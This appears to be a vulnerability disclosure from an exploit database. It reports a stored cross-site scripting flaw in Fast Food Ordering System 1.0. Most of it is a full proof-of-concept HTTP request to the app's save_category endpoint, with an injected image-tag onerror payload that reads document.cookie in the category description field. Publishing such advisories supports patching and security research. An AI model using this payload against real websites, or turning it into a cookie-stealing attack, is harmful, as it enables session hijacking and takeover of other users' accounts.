Share
## https://sploitus.com/exploit?id=PACKETSTORM:167309
## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting  
## Author: Ashish Kumar  
## Date: 05.31.2022  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software:  
https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html  
## Reference:  
https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6  
  
#Description:  
#The Line 255 of Master.php sends unvalidated data to a web browser, which  
can result in the browser executing malicious code.  
  
#echo $Master->save_category();  
  
#PoC:  
POST /ffos/classes/Master.php?f=save_category HTTP/1.1  
Host: localhost  
Content-Length: 480  
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"  
Accept: application/json, text/javascript, */*; q=0.01  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundarySmYVeqOBMhcSziZM  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/ffos/admin/?page=categories  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcj  
Connection: close  
  
------WebKitFormBoundarySmYVeqOBMhcSziZM  
Content-Disposition: form-data; name="id"  
  
10  
------WebKitFormBoundarySmYVeqOBMhcSziZM  
Content-Disposition: form-data; name="name"  
  
XSS  
------WebKitFormBoundarySmYVeqOBMhcSziZM  
Content-Disposition: form-data; name="description"  
  
Testing XSS "><img src="" onerror="alert(document.cookie)">  
------WebKitFormBoundarySmYVeqOBMhcSziZM  
Content-Disposition: form-data; name="status"  
  
1  
------WebKitFormBoundarySmYVeqOBMhcSziZM--